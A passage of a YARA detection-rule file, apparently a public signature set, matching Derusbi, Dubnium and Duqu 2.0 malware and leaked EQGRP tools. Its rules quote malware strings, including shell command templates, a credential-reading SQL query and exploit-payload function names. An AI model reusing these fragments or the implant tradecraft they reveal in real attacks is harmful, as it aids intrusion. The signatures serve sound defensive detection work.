    $s1 = "\\Registry\\User\\%s\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" wide fullword
    $s2 = "Update.dll" ascii fullword
    $s3 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WMI" wide fullword
    $s4 = "\\Driver\\nsiproxy" wide fullword
    $s5 = "HOST: %s" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 819200 and (2 of ($x*) or all of ($s*))
}

rule Derusbi_Code_Signing_Cert {
  meta:
    description = "Detects an executable signed with a certificate also used for Derusbi Trojan - suspicious"
    author = "Florian Roth"
    reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family"
    date = "2015-12-15"
    score = 40
  strings:
    $s1 = "Fuqing Dawu Technology Co.,Ltd.0" ascii fullword
    $s2 = "XL Games Co.,Ltd.0" ascii fullword
    $s3 = "Wemade Entertainment co.,Ltd0" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 819200 and 1 of them
}

rule XOR_4byte_Key {
  meta:
    description = "Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan)"
    author = "Florian Roth"
    reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family"
    date = "2015-12-15"
    score = 60
  strings:
    $s1 = { 85 C9 74 0A 31 06 01 1E 83 C6 04 49 EB F2 }
  condition:
    uint16(0) == 23117 and filesize < 921600 and all of them
}

rule apt_win32_dll_bergard_pgv_pvid_variant {
  meta:
    copyright = "Fidelis Cybersecurity"
    reference = "http://www.threatgeek.com/2016/05/turbo-twist-two-64-bit-derusbi-strains-converge.html"
  strings:
    $ = "Accept:"
    $ = "User-Agent: %s"
    $ = "Host: %s:%d"
    $ = "Cache-Control: no-cache"
    $ = "Connection: Keep-Alive"
    $ = "Cookie: pgv_pvid="
    $ = "Content-Type: application/x-octet-stream"
    $ = "User-Agent: %s"
    $ = "Host: %s:%d"
    $ = "Pragma: no-cache"
    $ = "Connection: Keep-Alive"
    $ = "HTTP/1.0"
  condition:
    (uint16(0) == 23117) and (all of them)
}

rule Dubnium_Sample_1 {
  meta:
    description = "Detects sample mentioned in the Dubnium Report"
    author = "Florian Roth"
    reference = "https://goo.gl/AW9Cuu"
    date = "2016-06-10"
    hash1 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba"
  strings:
    $key1 = "3b840e20e9555e9fb031c4ba1f1747ce25cc1d0ff664be676b9b4a90641ff194" ascii fullword
    $key2 = "90631f686a8c3dbc0703ffa353bc1fdf35774568ac62406f98a13ed8f47595fd" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 2048000 and all of them
}

rule Dubnium_Sample_2 {
  meta:
    description = "Detects sample mentioned in the Dubnium Report"
    author = "Florian Roth"
    reference = "https://goo.gl/AW9Cuu"
    date = "2016-06-10"
    hash1 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
  strings:
    $x1 = ":*:::D:\\:c:~:" ascii fullword
    $s2 = "SPMUVR" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 2048000 and all of them)
}

rule Dubnium_Sample_3 {
  meta:
    description = "Detects sample mentioned in the Dubnium Report"
    author = "Florian Roth"
    reference = "https://goo.gl/AW9Cuu"
    date = "2016-06-10"
    hash1 = "caefcdf2b4e5a928cdf9360b70960337f751ec4a5ab8c0b75851fc9a1ab507a8"
    hash2 = "e0362d319a8d0e13eda782a0d8da960dd96043e6cc3500faeae521d1747576e5"
    hash3 = "a77d1c452291a6f2f6ed89a4bac88dd03d38acde709b0061efd9f50e6d9f3827"
  strings:
    $x1 = "copy /y \"%s\" \"%s\" " ascii fullword
    $x2 = "del /f \"%s\" " ascii fullword
    $s1 = "del /f /ah \"%s\" " ascii fullword
    $s2 = "if exist \"%s\" goto Rept " ascii fullword
    $s3 = "\\*.*.lnk" ascii fullword
    $s4 = "Dropped" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 2048000 and 5 of them
}

rule Dubnium_Sample_5 {
  meta:
    description = "Detects sample mentioned in the Dubnium Report"
    author = "Florian Roth"
    reference = "https://goo.gl/AW9Cuu"
    date = "2016-06-10"
    super_rule = 1
    hash1 = "16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
    hash2 = "1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
    hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
    hash4 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
    hash5 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0"
    hash6 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba"
    hash7 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9"
    hash8 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f"
    hash9 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b"
  strings:
    $s1 = "$innn[i$[i$^i[e[mdi[m$jf1Wehn[^Whl[^iin_hf$11mahZijnjbi[^[W[f1n$dej$[hn]1[W1ni1l[ic1j[mZjchl$$^he[[j[a[1_iWc[e[" ascii fullword
    $s2 = "h$YWdh[$ij7^e$n[[_[h[i[[[\\][1$1[[j1W1[1cjm1[$[k1ZW_$$ncn[[Inbnnc[I9enanid[fZCX" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 9216000 and all of them
}

rule Dubnium_Sample_6 {
  meta:
    description = "Detects sample mentioned in the Dubnium Report"
    author = "Florian Roth"
    reference = "https://goo.gl/AW9Cuu"
    date = "2016-06-10"
    super_rule = 1
    hash1 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
    hash2 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0"
    hash3 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba"
  strings:
    $s1 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&()`~-_=+[{]{;',." ascii fullword
    $s2 = "e_$0[bW\\RZY\\jb\\ZY[nimiRc[jRZ]" ascii fullword
    $s3 = "f_RIdJ0W9RFb[$Fbc9[k_?Wn" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 4096000 and all of them
}

rule Dubnium_Sample_7 {
  meta:
    description = "Detects sample mentioned in the Dubnium Report"
    author = "Florian Roth"
    reference = "https://goo.gl/AW9Cuu"
    date = "2016-06-10"
    super_rule = 1
    hash1 = "16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
    hash2 = "1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
    hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
    hash4 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
    hash5 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0"
    hash6 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9"
    hash7 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f"
    hash8 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b"
  strings:
    $s1 = "hWI[$lZ![nJ_[[lk[8Ihlo8ZiIl[[[$Ynk[f_8[88WWWJW[YWnl$$Z[ilf!$IZ$!W>Wl![W!k!$l!WoW8$nj8![8n_I^$[>_n[ZY[[Xhn_c!nnfK[!Z" ascii fullword
    $s2 = "[i_^])[$n!]Wj^,h[,!WZmk^o$dZ[h[e!&W!l[$nd[d&)^Z\\^[[iWh][[[jPYO[g$$e&n\\,Wfg$[<g$[[ninn:j!!)Wk[nj[[o!!Y" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 9216000 and all of them
}

rule Dubnium_Sample_SSHOpenSSL {
  meta:
    description = "Detects sample mentioned in the Dubnium Report"
    author = "Florian Roth"
    reference = "https://goo.gl/AW9Cuu"
    date = "2016-06-10"
    hash1 = "6f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
    hash2 = "feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
    hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
    hash4 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f"
    hash5 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9"
    hash6 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b"
  strings:
    $s1 = "sshkeypairgen.exe" wide fullword
    $s2 = "OpenSSL: FATAL" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 9216000 and all of them
}

rule apt_duqu2_loaders {
  meta:
    copyright = "Kaspersky Lab"
    description = "Rule to detect Duqu 2.0 samples"
    last_modified = "2015-06-09"
    version = "1.0"
  strings:
    $a1 = "{AAFFC4F0-E04B-4C7C-B40A-B45DE971E81E}" wide
    $a2 = "\\\\.\\pipe\\{AAFFC4F0-E04B-4C7C-B40A-B45DE971E81E}" wide
    $a4 = "\\\\.\\pipe\\{AB6172ED-8105-4996-9D2A-597B5F827501}" wide
    $a5 = "Global\\{B54E3268-DE1E-4c1e-A667-2596751403AD}" wide
    $a8 = "SELECT `Data` FROM `Binary` WHERE `Name`='%s%i'" wide
    $a9 = "SELECT `Data` FROM `Binary` WHERE `Name`='CryptHash%i'" wide
    $a7 = "SELECT `%s` FROM `%s` WHERE `%s`='CAData%i'" wide
    $b1 = "MSI.dll"
    $b2 = "msi.dll"
    $b3 = "StartAction"
    $c1 = "msisvc_32@" wide
    $c2 = "PROP=" wide
    $c3 = "-Embedding" wide
    $c4 = "S:(ML;;NW;;;LW)" wide
    $d1 = "NameTypeBinaryDataCustomActionActionSourceTargetInstallExecuteSequenceConditionSequencePropertyValueMicrosoftManufacturer" nocase
    $d2 = { 2E 3F 41 56 3F 24 5F 42 69 6E 64 40 24 30 30 58 55 3F 24 5F 50 6D 66 5F 77 72 61 70 40 50 38 43 4C 52 ?? 40 40 41 45 58 58 5A 58 56 31 40 24 24 24 56 40 73 74 64 40 40 51 41 56 43 4C 52 ?? 40 40 40 73 74 64 40 40 }
  condition:
    ((uint16(0) == 23117) and ((any of ($a*)) or (all of ($b*)) or (all of ($c*))) and filesize < 100000) or ((uint32(0) == 3759263696) and ((any of ($a*)) or (all of ($b*)) or (all of ($c*)) or (any of ($d*))) and filesize < 20000000)
}

rule apt_duqu2_drivers {
  meta:
    copyright = "Kaspersky Lab"
    description = "Rule to detect Duqu 2.0 drivers"
    last_modified = "2015-06-09"
    version = "1.0"
  strings:
    $a1 = "\\DosDevices\\port_optimizer" wide nocase
    $a2 = "romanian.antihacker"
    $a3 = "PortOptimizerTermSrv" wide
    $a4 = "ugly.gorilla1"
    $b1 = "NdisIMCopySendCompletePerPacketInfo"
    $b2 = "NdisReEnumerateProtocolBindings"
    $b3 = "NdisOpenProtocolConfiguration"
  condition:
    uint16(0) == 23117 and (any of ($a*)) and (2 of ($b*)) and filesize < 100000
}

rule Duqu2_Generic1 {
  meta:
    description = "Kaspersky APT Report - Duqu2 Sample - Generic Rule"
    author = "Florian Roth"
    reference = "https://goo.gl/7yKyOj"
    date = "2015-06-10"
    super_rule = 1
    hash0 = "3f9168facb13429105a749d35569d1e91465d313"
    hash1 = "0a574234615fb2382d85cd6d1a250d6c437afecc"
    hash2 = "38447ed1d5e3454fe17699f86c0039f30cc64cde"
    hash3 = "5282d073ee1b3f6ce32222ccc2f6066e2ca9c172"
    hash4 = "edfca3f0196788f7fde22bd92a8817a957c10c52"
    hash5 = "6a4ffa6ca4d6fde8a30b6c8739785f4bd2b5c415"
    hash6 = "00170bf9983e70e8dd4f7afe3a92ce1d12664467"
    hash7 = "32f8689fd18c723339414618817edec6239b18f3"
    hash8 = "f860acec9920bc009a1ad5991f3d5871c2613672"
    hash9 = "413ba509e41c526373f991d1244bc7c7637d3e13"
    hash10 = "29cd99a9b6d11a09615b3f9ef63f1f3cffe7ead8"
    hash11 = "dfe1cb775719b529138e054e7246717304db00b1"
  strings:
    $s0 = "Global\\{B54E3268-DE1E-4c1e-A667-2596751403AD}" wide fullword
    $s1 = "SetSecurityDescriptorSacl" ascii fullword
    $s2 = "msisvc_32@" wide fullword
    $s3 = "CompareStringA" ascii fullword
    $s4 = "GetCommandLineW" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 153600 and all of them
}

rule APT_Kaspersky_Duqu2_procexp {
  meta:
    description = "Kaspersky APT Report - Duqu2 Sample - Malicious MSI"
    author = "Florian Roth"
    reference = "https://goo.gl/7yKyOj"
    date = "2015-06-10"
    hash1 = "2422835716066b6bcecb045ddd4f1fbc9486667a"
    hash2 = "b120620b5d82b05fee2c2153ceaf305807fa9f79"
    hash3 = "288ebfe21a71f83b5575dfcc92242579fb13910d"
  strings:
    $x1 = "svcmsi_32.dll" wide fullword
    $x2 = "msi3_32.dll" wide fullword
    $x3 = "msi4_32.dll" wide fullword
    $x4 = "MSI.dll" ascii fullword
    $s1 = "SELECT `Data` FROM `Binary` WHERE `Name`='%s%i'" wide fullword
    $s2 = "Sysinternals installer" wide fullword
    $s3 = "Process Explorer" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 102400 and (1 of ($x*)) and (all of ($s*))
}

rule APT_Kaspersky_Duqu2_SamsungPrint {
  meta:
    description = "Kaspersky APT Report - Duqu2 Sample - file 2a9a5afc342cde12c6eb9a91ad29f7afdfd8f0fb17b983dcfddceccfbc17af69"
    author = "Florian Roth"
    reference = "https://goo.gl/7yKyOj"
    date = "2015-06-10"
    hash = "ce39f41eb4506805efca7993d3b0b506ab6776ca"
  strings:
    $s0 = "Installer for printer drivers and applications" wide fullword
    $s1 = "msi4_32.dll" wide fullword
    $s2 = "HASHVAL" wide fullword
    $s3 = "SELECT `%s` FROM `%s` WHERE `%s`='CAData%i'" wide fullword
    $s4 = "ca.dll" ascii fullword
    $s5 = "Samsung Electronics Co., Ltd." wide fullword
  condition:
    uint16(0) == 23117 and filesize < 83968 and all of them
}

rule APT_Kaspersky_Duqu2_msi3_32 {
  meta:
    description = "Kaspersky APT Report - Duqu2 Sample - file d8a849654ab97debaf28ae5b749c3b1ff1812ea49978713853333db48c3972c3"
    author = "Florian Roth"
    reference = "https://goo.gl/7yKyOj"
    date = "2015-06-10"
    hash = "53d9ef9e0267f10cc10f78331a9e491b3211046b"
  strings:
    $s0 = "ProcessUserAccounts" ascii fullword
    $s1 = "SELECT `UserName`, `Password`, `Attributes` FROM `CustomUserAccounts`" wide fullword
    $s2 = "SELECT `UserName` FROM `CustomUserAccounts`" wide fullword
    $s3 = "SELECT `Data` FROM `Binary` WHERE `Name`='CryptHash%i'" wide fullword
    $s4 = "msi3_32.dll" wide fullword
    $s5 = "RunDLL" ascii fullword
    $s6 = "MSI Custom Action v3" wide fullword
    $s7 = "msi3_32" wide fullword
    $s8 = "Operating System" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 73728 and all of them
}

rule EQGRP_noclient_3_0_5 {
  meta:
    description = "Detects tool from EQGRP toolset - file noclient-3.0.5.3"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-15"
  strings:
    $x1 = "-C %s 127.0.0.1\" scripme -F -t JACKPOPIN4 '&" ascii fullword
    $x2 = "Command too long!  What the HELL are you trying to do to me?!?!  Try one smaller than %d bozo." ascii fullword
    $x3 = "sh -c \"ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx \"" ascii fullword
    $x4 = "Error from ourtn, did not find keys=target in tn.spayed" ascii fullword
    $x5 = "ourtn -d -D %s -W 127.0.0.1:%d  -i %s -p %d %s %s" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 716800 and 1 of them) or (all of them)
}

rule EQGRP_installdate {
  meta:
    description = "Detects tool from EQGRP toolset - file installdate.pl"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-15"
  strings:
    $x1 = "#Provide hex or EP log as command-line argument or as input" ascii fullword
    $x2 = "print \"Gimme hex: \";" ascii fullword
    $x3 = "if ($line =~ /Reg_Dword:  (\\d\\d:\\d\\d:\\d\\d.\\d+ \\d+ - )?(\\S*)/) {" ascii fullword
    $s1 = "if ($_ =~ /InstallDate/) {" ascii fullword
    $s2 = "if (not($cmdInput)) {" ascii fullword
    $s3 = "print \"$hex in decimal=$dec\\n\\n\";" ascii fullword
  condition:
    filesize < 2048 and (1 of ($x*) or 3 of them)
}

rule EQGRP_teflondoor {
  meta:
    description = "Detects tool from EQGRP toolset - file teflondoor.exe"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-15"
  strings:
    $x1 = "%s: abort.  Code is %d.  Message is '%s'" ascii fullword
    $x2 = "%s: %li b (%li%%)" ascii fullword
    $s1 = "no winsock" ascii fullword
    $s2 = "%s: %s file '%s'" ascii fullword
    $s3 = "peer: connect" ascii fullword
    $s4 = "read: write" ascii fullword
    $s5 = "%s: done!" ascii fullword
    $s6 = "%s: %li b" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 30720 and 1 of ($x*) and 3 of them
}

rule EQGRP_durablenapkin_solaris_2_0_1 {
  meta:
    description = "Detects tool from EQGRP toolset - file durablenapkin.solaris.2.0.1.1"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-15"
  strings:
    $s1 = "recv_ack: %s: Service not supplied by provider" ascii fullword
    $s2 = "send_request: putmsg \"%s\": %s" ascii fullword
    $s3 = "port undefined" ascii fullword
    $s4 = "recv_ack: %s getmsg: %s" ascii fullword
    $s5 = ">> %d -- %d" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 40960 and 2 of them)
}

rule EQGRP_teflonhandle {
  meta:
    description = "Detects tool from EQGRP toolset - file teflonhandle.exe"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-15"
  strings:
    $s1 = "%s [infile] [outfile] /k 0x[%i character hex key] </g>" ascii fullword
    $s2 = "File %s already exists.  Overwrite? (y/n) " ascii fullword
    $s3 = "Random Key : 0x" ascii fullword
    $s4 = "done (%i bytes written)." ascii fullword
    $s5 = "%s --> %s..." ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 20480 and 2 of them
}

rule EQGRP_false {
  meta:
    description = "Detects tool from EQGRP toolset - file false.exe"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-15"
  strings:
    $s1 = { 00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00 00 25 6C 75 2E 25 6C 75 2E 25 6C 75 2E 25 6C 75 00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00 00 25 32 2E 32 58 20 00 00 0A 00 00 00 25 64 20 2D 20 25 64 20 25 64 0A 00 25 64 0A 00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00 00 25 64 20 2D 20 25 64 0A 00 00 00 00 25 64 20 2D 20 25 64 }
  condition:
    uint16(0) == 23117 and filesize < 51200 and $s1
}

rule EQGRP_bc_genpkt {
  meta:
    description = "Detects tool from EQGRP toolset - file bc-genpkt"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-15"
  strings:
    $x1 = "load auxiliary object=%s requested by file=%s" ascii fullword
    $x2 = "size of new packet, should be %d <= size <= %d bytes" ascii fullword
    $x3 = "verbosity - show lengths, packet dumps, etc" ascii fullword
    $s1 = "%s: error while loading shared libraries: %s%s%s%s%s" ascii fullword
    $s2 = "cannot dynamically load executable" ascii fullword
    $s3 = "binding file %s to %s: %s symbol `%s' [%s]" ascii fullword
    $s4 = "randomize the initiator cookie" ascii fullword
  condition:
    uint16(0) == 17791 and filesize < 1024000 and (1 of ($s*) and 3 of them)
}

rule EQGRP_dn_1_0_2_1 {
  meta:
    description = "Detects tool from EQGRP toolset - file dn.1.0.2.1.linux"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-15"
  strings:
    $s1 = "Valid commands are: SMAC, DMAC, INT, PACK, DONE, GO" ascii fullword
    $s2 = "invalid format suggest DMAC=00:00:00:00:00:00" ascii fullword
    $s3 = "SMAC=%02x:%02x:%02x:%02x:%02x:%02x" ascii fullword
    $s4 = "Not everything is set yet" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 30720 and 2 of them)
}

rule EQGRP_morel {
  meta:
    description = "Detects tool from EQGRP toolset - file morel.exe"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-15"
    hash1 = "a9152e67f507c9a179bb8478b58e5c71c444a5a39ae3082e04820a0613cd6d9f"
  strings:
    $s1 = "%d - %d, %d" ascii fullword
    $s2 = "%d - %lu.%lu %d.%lu" ascii fullword
    $s3 = "%d - %d %d" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 61440 and all of them)
}

rule EQGRP_bc_parser {
  meta:
    description = "Detects tool from EQGRP toolset - file bc-parser"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-15"
    hash1 = "879f2f1ae5d18a3a5310aeeafec22484607649644e5ecb7d8a72f0877ac19cee"
  strings:
    $s1 = "*** Target may be susceptible to FALSEMOREL      ***" ascii fullword
    $s2 = "*** Target is susceptible to FALSEMOREL          ***" ascii fullword
  condition:
    uint16(0) == 17791 and 1 of them
}

rule EQGRP_1212 {
  meta:
    description = "Detects tool from EQGRP toolset - file 1212.pl"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-15"
  strings:
    $s1 = "if (!(($srcip,$dstip,$srcport,$dstport) = ($line=~/^([a-f0-9]{8})([a-f0-9]{8})([a-f0-9]{4})([a-f0-9]{4})$/)))" ascii fullword
    $s2 = "$ans=\"$srcip:$srcport -> $dstip:$dstport\";" ascii fullword
    $s3 = "return \"ERROR:$line is not a valid port\";" ascii fullword
    $s4 = "$dstport=hextoPort($dstport);" ascii fullword
    $s5 = "sub hextoPort" ascii fullword
    $s6 = "$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;" ascii fullword
  condition:
    filesize < 6144 and 4 of them
}

rule EQGRP_1212_dehex {
  meta:
    description = "Detects tool from EQGRP toolset - from files 1212.pl, dehex.pl"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-15"
  strings:
    $s1 = "return \"ERROR:$line is not a valid address\";" ascii fullword
    $s2 = "print \"ERROR: the filename or hex representation needs to be one argument try using \\\"'s\\n\";" ascii fullword
    $s3 = "push(@octets,$byte_table{$tempi});" ascii fullword
    $s4 = "$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;" ascii fullword
    $s5 = "print hextoIP($ARGV[0]);" ascii fullword
  condition:
    (uint16(0) == 8483 and filesize < 6144 and (5 of ($s*))) or (all of them)
}

rule install_get_persistent_filenames {
  meta:
    description = "EQGRP Toolset Firewall - file install_get_persistent_filenames"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "4a50ec4bf42087e932e9e67e0ea4c09e52a475d351981bb4c9851fda02b35291"
  strings:
    $s1 = "Generates the persistence file name and prints it out." ascii fullword
  condition:
    (uint16(0) == 17791 and all of them)
}

rule EQGRP_create_dns_injection {
  meta:
    description = "EQGRP Toolset Firewall - file create_dns_injection.py"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "488f3cc21db0688d09e13eb85a197a1d37902612c3e302132c84e07bc42b1c32"
  strings:
    $s1 = "Name:   A hostname: 'host.network.com', a decimal numeric offset within" ascii fullword
    $s2 = "-a www.badguy.net,CNAME,1800,host.badguy.net \\\\" ascii fullword
  condition:
    1 of them
}

rule EQGRP_screamingplow {
  meta:
    description = "EQGRP Toolset Firewall - file screamingplow.sh"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "c7f4104c4607a03a1d27c832e1ebfc6ab252a27a1709015b5f1617b534f0090a"
  strings:
    $s1 = "What is the name of your PBD:" ascii fullword
    $s2 = "You are now ready for a ScreamPlow" ascii fullword
  condition:
    1 of them
}

rule EQGRP_MixText {
  meta:
    description = "EQGRP Toolset Firewall - file MixText.py"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "e4d24e30e6cc3a0aa0032dbbd2b68c60bac216bef524eaf56296430aa05b3795"
  strings:
    $s1 = "BinStore enabled implants." ascii fullword
  condition:
    1 of them
}

rule EQGRP_tunnel_state_reader {
  meta:
    description = "EQGRP Toolset Firewall - file tunnel_state_reader"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "49d48ca1ec741f462fde80da68b64dfa5090855647520d29e345ef563113616c"
  strings:
    $s1 = "Active connections will be maintained for this tunnel. Timeout:" ascii fullword
    $s5 = "%s: compatible with BLATSTING version 1.2" ascii fullword
  condition:
    1 of them
}

rule EQGRP_payload {
  meta:
    description = "EQGRP Toolset Firewall - file payload.py"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "21bed6d699b1fbde74cbcec93575c9694d5bea832cd191f59eb3e4140e5c5e07"
  strings:
    $s1 = "can't find target version module!" ascii fullword
    $s2 = "class Payload:" ascii fullword
  condition:
    all of them
}

rule EQGRP_eligiblecandidate {
  meta:
    description = "EQGRP Toolset Firewall - file eligiblecandidate.py"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "c4567c00734dedf1c875ecbbd56c1561a1610bedb4621d9c8899acec57353d86"
  strings:
    $o1 = "Connection timed out. Only a problem if the callback was not received." ascii fullword
    $o2 = "Could not reliably detect cookie. Using 'session_id'..." ascii fullword
    $c1 = "def build_exploit_payload(self,cmd=\"/tmp/httpd\"):" ascii fullword
    $c2 = "self.build_exploit_payload(cmd)" ascii fullword
  condition:
    1 of them
}

rule EQGRP_BUSURPER_2211_724 {
  meta:
    description = "EQGRP Toolset Firewall - file BUSURPER-2211-724.exe"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "d809d6ff23a9eee53d2132d2c13a9ac5d0cb3037c60e229373fc59a4f14bc744"
  strings:
    $s1 = ".got_loader" ascii fullword
    $s2 = "_start_text" ascii fullword
    $s3 = "IMPLANT" ascii fullword
    $s4 = "KEEPGOING" ascii fullword
    $s5 = "upgrade_implant" ascii fullword
  condition:
    all of them
}

rule EQGRP_networkProfiler_orderScans {
  meta:
    description = "EQGRP Toolset Firewall - file networkProfiler_orderScans.sh"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "ea986ddee09352f342ac160e805312e3a901e58d2beddf79cd421443ba8c9898"
  strings:
    $x1 = "Unable to save off predefinedScans directory" ascii fullword
    $x2 = "Re-orders the networkProfiler scans so they show up in order in the LP" ascii fullword
  condition:
    1 of them
}

rule EQGRP_epicbanana_2_1_0_1 {
  meta:
    description = "EQGRP Toolset Firewall - file epicbanana_2.1.0.1.py"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "4b13cc183c3aaa8af43ef3721e254b54296c8089a0cd545ee3b867419bb66f61"
  strings:
    $s1 = "failed to create version-specific payload" ascii fullword
    $s2 = "(are you sure you did \"make [version]\" in versions?)" ascii fullword
  condition:
    1 of them
}

rule EQGRP_sniffer_xml2pcap {
  meta:
    description = "EQGRP Toolset Firewall - file sniffer_xml2pcap"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "f5e5d75cfcd86e5c94b0e6f21bbac886c7e540698b1556d88a83cc58165b8e42"
  strings:
    $x1 = "-s/--srcip <sourceIP>  Use given source IP (if sniffer doesn't collect source IP)" ascii fullword
    $x2 = "convert an XML file generated by the BLATSTING sniffer module into a pcap capture file." ascii fullword
  condition:
    1 of them
}

rule EQGRP_BananaAid {
  meta:
    description = "EQGRP Toolset Firewall - file BananaAid"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "7a4fb825e63dc612de81bc83313acf5eccaa7285afc05941ac1fef199279519f"
  strings:
    $x1 = "(might have to delete key in ~/.ssh/known_hosts on linux box)" ascii fullword
    $x2 = "scp BGLEE-" ascii
    $x3 = "should be 4bfe94b1 for clean bootloader version 3.0; " ascii fullword
    $x4 = "scp <configured implant> <username>@<IPaddr>:onfig" ascii fullword
  condition:
    1 of them
}

rule EQGRP_bo {
  meta:
    description = "EQGRP Toolset Firewall - file bo"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "aa8b363073e8ae754b1836c30f440d7619890ded92fb5b97c73294b15d22441d"
  strings:
    $s1 = "ERROR: failed to open %s: %d" ascii fullword
    $s2 = "__libc_start_main@@GLIBC_2.0" ascii fullword
    $s3 = "serial number: %s" ascii fullword
    $s4 = "strerror@@GLIBC_2.0" ascii fullword
    $s5 = "ERROR: mmap failed: %d" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 20480 and all of them)
}

rule EQGRP_SecondDate_2211 {
  meta:
    description = "EQGRP Toolset Firewall - file SecondDate-2211.exe"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "2337d0c81474d03a02c404cada699cf1b86c3c248ea808d4045b86305daa2607"
  strings:
    $s1 = "SD_processControlPacket" ascii fullword
    $s2 = "Encryption_rc4SetKey" ascii fullword
    $s3 = ".got_loader" ascii fullword
